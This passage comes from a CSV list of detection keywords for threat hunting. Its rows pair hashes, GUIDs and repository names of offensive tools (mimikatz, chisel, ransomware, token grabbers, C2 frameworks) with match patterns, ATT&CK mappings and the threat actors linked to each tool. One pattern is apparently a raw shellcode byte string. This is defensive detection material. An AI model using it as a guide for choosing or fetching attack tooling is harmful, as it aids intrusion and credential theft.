TA0007","N/A","N/A","Reconnaissance","https://github.com/jasonxtn/Argus","1","0","#filehash","N/A","4","10","1951","210","2024-10-08T19:04:27Z","2024-10-01T22:13:51Z","26450" "*4FB03AD0-96FF-4730-801A-4F997795D920*",".{0,1000}4FB03AD0\-96FF\-4730\-801A\-4F997795D920.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","26452" "*4fbeeeeda8c0b7858a26a16fc65709b3a3c08d309032602574f4f7438964612f*",".{0,1000}4fbeeeeda8c0b7858a26a16fc65709b3a3c08d309032602574f4f7438964612f.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","26454" "*4fcf193202e55eff267792c86cea4098711b24d3fa0cca8e03027da2ddb3206a*",".{0,1000}4fcf193202e55eff267792c86cea4098711b24d3fa0cca8e03027da2ddb3206a.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","26455" "*4FEAB888-F514-4F2E-A4F7-5989A86A69DE*",".{0,1000}4FEAB888\-F514\-4F2E\-A4F7\-5989A86A69DE.{0,1000}","offensive_tool_keyword","SharpSAMDump","SAM dumping via the registry in C#/.NET","T1003.002 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/jojonas/SharpSAMDump","1","0","#GUIDproject","N/A","10","1","48","8","2025-01-16T07:08:58Z","2024-05-27T10:53:27Z","26460" 
"*4ff3269f19b3cabf56ed566d1f43636587c6fd61facb013e69244babf3c9c2a8*",".{0,1000}4ff3269f19b3cabf56ed566d1f43636587c6fd61facb013e69244babf3c9c2a8.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26462" "*4ff61cccbdf23cddf5699b2499468ed368967fc90f0eee241679c07c561ad2d8*",".{0,1000}4ff61cccbdf23cddf5699b2499468ed368967fc90f0eee241679c07c561ad2d8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26463" "*4ff7578df7293e50c9bdd48657a6ba0c60e1f6d06a2dd334f605af34fe6f75a5*",".{0,1000}4ff7578df7293e50c9bdd48657a6ba0c60e1f6d06a2dd334f605af34fe6f75a5.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat 
Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26464" "*4ff7578df7293e50c9bdd48657a6ba0c60e1f6d06a2dd334f605af34fe6f75a5*",".{0,1000}4ff7578df7293e50c9bdd48657a6ba0c60e1f6d06a2dd334f605af34fe6f75a5.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26465" "*4ffaf4c7ad9c606cdbce082d3b428e7666ef0ea73dcb36816a9ecfdb12d0ec34*",".{0,1000}4ffaf4c7ad9c606cdbce082d3b428e7666ef0ea73dcb36816a9ecfdb12d0ec34.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","26466" "*4ffe43c71089a936b582e4840c196698a269e62e43a7a48ba3c53124809ab585*",".{0,1000}4ffe43c71089a936b582e4840c196698a269e62e43a7a48ba3c53124809ab585.{0,1000}","offensive_tool_keyword","ScriptBlock-Smuggling","SCRIPTBLOCK SMUGGLING: SPOOFING POWERSHELL SECURITY LOGS AND BYPASSING AMSI WITHOUT REFLECTION OR PATCHING","T1059.001 - T1562.001 - T1112 - T1202 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/BC-SECURITY/ScriptBlock-Smuggling","1","0","#filehash","N/A","8","1","89","13","2024-06-18T08:35:50Z","2024-06-12T21:44:47Z","26467" "*4g3nt47/Striker*",".{0,1000}4g3nt47\/Striker.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","N/A","10","10","301","42","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z","26468" "*50008e82cf48a421aeda45c87b598339dfb18f7b336cdf9e4e2fb8677b377ea0*",".{0,1000}50008e82cf48a421aeda45c87b598339dfb18f7b336cdf9e4e2fb8677b377ea0.{0,1000}","offensive_tool_keyword","Argus","Information Gathering Toolkit","T1590.001 - T1590.002 - T1595.003 - T1016 - T1046 - T1590.005","TA0043 - 
TA0007","N/A","N/A","Reconnaissance","https://github.com/jasonxtn/Argus","1","0","#filehash","N/A","4","10","1951","210","2024-10-08T19:04:27Z","2024-10-01T22:13:51Z","26470" "*5001938c441ea194bc012da03351a938611309b74c0cf5481dd2de30cb917ae1*",".{0,1000}5001938c441ea194bc012da03351a938611309b74c0cf5481dd2de30cb917ae1.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","26471" "*50050/SharpC2*",".{0,1000}50050\/SharpC2.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","26472" "*50084b701b0463d1698211f2d0427c3eb6322be963c46cf9a4eb39e01a94cddc*",".{0,1000}50084b701b0463d1698211f2d0427c3eb6322be963c46cf9a4eb39e01a94cddc.{0,1000}","offensive_tool_keyword","Orc","Orc is a post-exploitation framework for Linux written in Bash","T1059.004 - T1036.005 - T1070.002 - T1012 - T1082 - T1003 - T1555.003 - T1049 - T1134.001 - T1202","TA0005 - TA0003 - TA0002 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zMarch/Orc","1","0","#linux #filehash","N/A","9","4","395","53","2019-11-12T18:21:27Z","2018-08-16T11:31:39Z","26473" 
"*500fd5f1772e01b5f7832f48e36e698204db2b8944bbe5162b77a70c2c59c044*",".{0,1000}500fd5f1772e01b5f7832f48e36e698204db2b8944bbe5162b77a70c2c59c044.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26475" "*5010BEE8-0944-4655-987F-AB3BB376E774*",".{0,1000}5010BEE8\-0944\-4655\-987F\-AB3BB376E774.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","#GUIDproject","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","26476" "*5013e8763027aeb90e09aa70c4d29f548facb761f6c6ba6a43fe4d9ca9d58a71*",".{0,1000}5013e8763027aeb90e09aa70c4d29f548facb761f6c6ba6a43fe4d9ca9d58a71.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","26477" "*501d518404e4d32996557998d3941a72b8a09e405f07b9a2b3f320a60a7ea711*",".{0,1000}501d518404e4d32996557998d3941a72b8a09e405f07b9a2b3f320a60a7ea711.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","26479" "*5027474f59bb0dd2c2fcee52a0b689bd3d17068dce81fbbceffa1f52fb732223*",".{0,1000}5027474f59bb0dd2c2fcee52a0b689bd3d17068dce81fbbceffa1f52fb732223.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","#filehash","N/A","10","9","N/A","N/A","N/A","N/A","26480" "*5030143146822b7274ae44cab7267ee914c71216ac54e51516b0ee16f0d394bf*",".{0,1000}5030143146822b7274ae44cab7267ee914c71216ac54e51516b0ee16f0d394bf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26481" "*5033ec3ed6f2c060b95608439b3d3f69295b6b9a344e638e1412a208fa2357b2*",".{0,1000}5033ec3ed6f2c060b95608439b3d3f69295b6b9a344e638e1412a208fa2357b2.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - 
TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","26482" "*50376d47e0c921dfc85a5117735f9de297efd826fe152b2fc44d3aa4281e13c5*",".{0,1000}50376d47e0c921dfc85a5117735f9de297efd826fe152b2fc44d3aa4281e13c5.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#filehash","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","26484" "*50388787c5a5da5c25ca1f6bfdaf3f09c3c78d9f0306e87b7e7d191bf679d870*",".{0,1000}50388787c5a5da5c25ca1f6bfdaf3f09c3c78d9f0306e87b7e7d191bf679d870.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","#filehash","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","26485" "*503a03cf035644aae49c197df60a93374f8cf837d0078206e278194c79b6a42b*",".{0,1000}503a03cf035644aae49c197df60a93374f8cf837d0078206e278194c79b6a42b.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","26486" "*503cf7c6f7afe5c03e8ed9bffa0b3b13443f1224e37b889e7add4c0dfe747322*",".{0,1000}503cf7c6f7afe5c03e8ed9bffa0b3b13443f1224e37b889e7add4c0dfe747322.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26488" "*503e912598061959f6564c5be9aa4f4ad4ac2a6530f1d84387fcfb7915275285*",".{0,1000}503e912598061959f6564c5be9aa4f4ad4ac2a6530f1d84387fcfb7915275285.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26489" "*503ed594a822f455532efad9786845a6499fb6de509591bdd37317a469de40c6*",".{0,1000}503ed594a822f455532efad9786845a6499fb6de509591bdd37317a469de40c6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26490" "*5042151210128f823c5cc143d52c6df18ea3bab1f834f7613d57600a6afc543e*",".{0,1000}5042151210128f823c5cc143d52c6df18ea3bab1f834f7613d57600a6afc543e.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","0","#filehash","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","26492" "*504e948af4200ab5d187a6687d50144bb1b3b95fa0ee4d7099e05ffd7f60f28c*",".{0,1000}504e948af4200ab5d187a6687d50144bb1b3b95fa0ee4d7099e05ffd7f60f28c.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26495" "*505152535657556A605A6863616C6354594883EC2865488B32488B7618488B761048AD488B30488B7E3003573C8B5C17288B741F204801FE8B541F240FB72C178D5202AD813C0757696E4575EF8B741F1C4801FE8B34AE4801F799FFD74883C4305D5F5E5B5A5958C3*",".{0,1000}505152535657556A605A6863616C6354594883EC2865488B32488B7618488B761048AD488B30488B7E3003573C8B5C17288B741F204801FE8B541F240FB72C178D5202AD813C0757696E4575EF8B741F1C4801FE8B34AE4801F799FFD74883C4305D5F5E5B5A5958C3.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use them with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","26496" "*50588c73e5448ff5254961039e431e5fd4ad532fbc58483c53870b77554c0ad2*",".{0,1000}50588c73e5448ff5254961039e431e5fd4ad532fbc58483c53870b77554c0ad2.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26497" "*5059f0c09b5561445b48a8566a3754caf1472f8539194b35428bb3ff7690f06e*",".{0,1000}5059f0c09b5561445b48a8566a3754caf1472f8539194b35428bb3ff7690f06e.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","26498" "*505bb78684c53f9fb96c92611bbd7ed7096c166f3621fc602b4f0402e0605621*",".{0,1000}505bb78684c53f9fb96c92611bbd7ed7096c166f3621fc602b4f0402e0605621.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","#filehash","N/A","10","","N/A","","","","26499" "*5062dae017d539693b9e6cef1cf8018aa4963b6a01ef2614cff020fd85f8ba07*",".{0,1000}5062dae017d539693b9e6cef1cf8018aa4963b6a01ef2614cff020fd85f8ba07.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework 
entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","26500" "*50662415d68f78b67b116ea7f19ab8024bfa6fae117182488e53bf88fef2638a*",".{0,1000}50662415d68f78b67b116ea7f19ab8024bfa6fae117182488e53bf88fef2638a.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26501" "*5067F916-9971-47D6-BBCB-85FB3982584F*",".{0,1000}5067F916\-9971\-47D6\-BBCB\-85FB3982584F.{0,1000}","offensive_tool_keyword","PowerShdll","Run PowerShell with dlls only Does not require access to powershell.exe as it uses powershell automation dlls. PowerShdll can be run with: rundll32.exe. installutil.exe. regsvcs.exe. regasm.exe. regsvr32.exe or as a standalone executable.","T1059 - T1218 - T1216 - T1053 - T1118","TA0002 - TA0008 - TA0003","N/A","N/A","Defense Evasion","https://github.com/p3nt4/PowerShdll","1","0","#GUIDproject","N/A","N/A","10","1794","256","2021-03-17T02:02:23Z","2016-07-15T00:08:32Z","26502" "*506efcecbd3508595df39add1b44c29682bd595e2b1f6ac11476baa4a5ddabc8*",".{0,1000}506efcecbd3508595df39add1b44c29682bd595e2b1f6ac11476baa4a5ddabc8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26503" "*5071ae9c0b80dd380ce78be640a8116f262c9a22ffe54cbbb062e9922ab18776*",".{0,1000}5071ae9c0b80dd380ce78be640a8116f262c9a22ffe54cbbb062e9922ab18776.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26504" "*5071f02457717295c663c269c01d40b9e789d386281c3faa47ab1e88eb9fa7c5*",".{0,1000}5071f02457717295c663c269c01d40b9e789d386281c3faa47ab1e88eb9fa7c5.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","26505" "*5072c4beef28abdb0c53a1f33836facec9e651f6384dedb62611dc3a4d2403d5*",".{0,1000}5072c4beef28abdb0c53a1f33836facec9e651f6384dedb62611dc3a4d2403d5.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of UAC Bypass Techniques Weaponized as BOFs","T1548.002 - T1203 - T1055 - 
T1134.002","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/icyguider/UAC-BOF-Bonanza","1","0","#filehash","N/A","10","6","500","65","2024-02-21T22:07:54Z","2024-02-16T14:47:13Z","26506" "*5073563a45bb315d8f02df7058cb92b2b285160c90a159fc2e68e1a17d807bba*",".{0,1000}5073563a45bb315d8f02df7058cb92b2b285160c90a159fc2e68e1a17d807bba.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","26507" "*507503b18f9fd0a2ad51c175946c3a591f84eade030a59f697c66991771ee8ee*",".{0,1000}507503b18f9fd0a2ad51c175946c3a591f84eade030a59f697c66991771ee8ee.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26508" "*50760fb11c588feb1bd1134321070c53d5b67f7c151ecb37cfd5d8eac1900c66*",".{0,1000}50760fb11c588feb1bd1134321070c53d5b67f7c151ecb37cfd5d8eac1900c66.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26509" "*507e8666c239397561c58609f7ea569c9c49ddbb900cd260e7e42b02d03cfd87*",".{0,1000}507e8666c239397561c58609f7ea569c9c49ddbb900cd260e7e42b02d03cfd87.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","#filehash","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","26511" "*50832dcb77c29cfaadcf530487eb2e4430ae79e702f9866321a484d8d78dc28a*",".{0,1000}50832dcb77c29cfaadcf530487eb2e4430ae79e702f9866321a484d8d78dc28a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
